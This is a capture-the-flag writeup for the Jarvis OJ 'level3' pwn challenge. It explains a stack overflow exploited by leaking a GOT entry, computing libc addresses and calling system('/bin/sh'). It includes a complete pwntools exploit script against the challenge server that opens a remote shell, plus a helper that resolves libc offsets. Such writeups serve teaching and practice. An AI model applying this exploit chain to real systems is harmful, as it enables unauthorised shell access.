Introduction:
Project: https://coding.net/u/yihangwang/p/pwnme/git (collection of pwn challenges and writeups)
Download: https://dn.jarvisoj.com/challengefiles/level3.rar.1ce2f904ead905afbadd33de1d0c391d
Analysis:
First, the read() call in vulnerable_function() reads more bytes than the stack buffer holds, so it can overflow.
That means we control the program's flow and can build a fake call stack out of any functions whose addresses we already know.
So we first use the write() call in vulnerable_function() to print the address of one function stored in the GOT,
then use the libc file supplied with the challenge to compute the addresses of system() and of the "/bin/sh" string from that leak (leaked address minus the symbol's offset in libc gives the libc base),
and finally return into vulnerable_function() again so its read() lets us
overflow a second time and set up the call stack for system("/bin/sh"), which gives us a shell.
Address:
nc pwn2.jarvisoj.com 9879
Exploit code:
#!/usr/bin/env python
# encoding:utf-8
from pwn import *
write_address = p32(0x08048340) # address of write() in the PLT
got_read_address = p32(0x0804A00C) # GOT entry that stores the real address of read()
payload = "A" * 0x88 + "BBBB"
payload += write_address
payload += p32(0x0804844B) # address of vulnerable_function(): write() returns here so we can overflow again
payload += p32(0x01) # first argument of write(): file descriptor 1 (stdout)
payload += got_read_address # second argument of write(): the buffer to print, i.e. the GOT entry
payload += p32(0x04) # third argument of write(): number of bytes to print
# Io = process("./level3")
Io = remote('pwn2.jarvisoj.com',9879)
Io.recvuntil("Input:\n")
Io.send(payload)
temp = Io.recv(4)
read_address = u32(temp[0:4])
print(hex(read_address))
# sun@sun:~/pwnme/lessons/jarvisoj/6$ readelf -a ./libc.so.6 | grep " read@"
# 958: 000d5980 101 FUNC WEAK DEFAULT 13 read@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/jarvisoj/6$ readelf -a ./libc-2.19.so | grep " read@"
# 950: 000daf60 125 FUNC WEAK DEFAULT 12 read@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/jarvisoj/6$ readelf -a ./libc-2.19.so | grep " system@"
# 1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/jarvisoj/6$ readelf -a ./libc-2.19.so | grep " exit@"
# 139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/jarvisoj/6$ strings -a -t x ./libc-2.19.so | grep "/bin/sh"
# 16084c /bin/sh
# read_libc_address = 0x000D5980
read_libc_address = 0x000daf60
offset = read_address - read_libc_address
# system_address = offset + 0x3ada0
system_address = offset + 0x00040310
print(hex(system_address))
# exit_address = offset + 0x2e9d0
exit_address = offset + 0x00033260
print(hex(exit_address))
# bin_sh_address = offset + 0x15b82b
bin_sh_address = offset + 0x16084c
print(hex(bin_sh_address))
payload = "A" * 0x88 + "BBBB"
payload += p32(system_address)
payload += p32(exit_address)
payload += p32(bin_sh_address)
Io.sendline(payload)
Io.interactive()
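The offset arithmetic from the analysis, as an added worked example that is not part of the original writeup: it parses the readelf and strings lines quoted in the script above, derives the libc base from the leaked read@got value, and adds the sanity check a practitioner wants, that the base must be page-aligned, which is how a mismatched libc build (the commented-out libc.so.6 offsets) shows up before anything else goes wrong. The leak value 0xf7edaf60 is constructed for the demonstration.

```python
import re

PAGE_SIZE = 0x1000

# readelf -s / strings -a -t x lines copied from the script above (libc-2.19.so)
READELF_LIBC219 = """\
   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
"""
STRINGS_LIBC219 = " 16084c /bin/sh\n"
# read() from the other libc build (libc.so.6) that the script first tried
READELF_OTHER = "   958: 000d5980   101 FUNC    WEAK   DEFAULT   13 read@@GLIBC_2.0\n"

SYMBOL_RE = re.compile(r"\s*\d+:\s+([0-9a-fA-F]+)\s+\d+\s+\w+\s+\w+\s+\w+\s+\S+\s+(\w+)")


def parse_symbol_offsets(readelf_text):
    """Map symbol name (version suffix stripped) -> offset inside libc."""
    offsets = {}
    for line in readelf_text.splitlines():
        m = SYMBOL_RE.match(line)
        if m:
            offsets[m.group(2)] = int(m.group(1), 16)
    return offsets


def parse_string_offsets(strings_text):
    """Map string -> offset inside libc, from `strings -a -t x` output."""
    offsets = {}
    for line in strings_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            offsets[parts[1]] = int(parts[0], 16)
    return offsets


def resolve_libc(leaked_read, readelf_text, strings_text):
    """Turn the leaked read@got value into the libc base and the addresses the
    second stage needs. libc is mapped page-aligned, so a base that is not a
    multiple of PAGE_SIZE means the offsets come from a different libc build."""
    symbols = parse_symbol_offsets(readelf_text)
    base = leaked_read - symbols["read"]
    if base % PAGE_SIZE:
        raise ValueError("base 0x%x not page-aligned: wrong libc for this leak" % base)
    strings = parse_string_offsets(strings_text)
    return {"base": base, "system": base + symbols["system"],
            "exit": base + symbols["exit"], "bin_sh": base + strings["/bin/sh"]}


if __name__ == "__main__":
    # constructed leak value, as if libc were loaded at base 0xf7e00000
    for name, addr in sorted(resolve_libc(0xf7edaf60, READELF_LIBC219, STRINGS_LIBC219).items()):
        print("%-7s 0x%08x" % (name, addr))
```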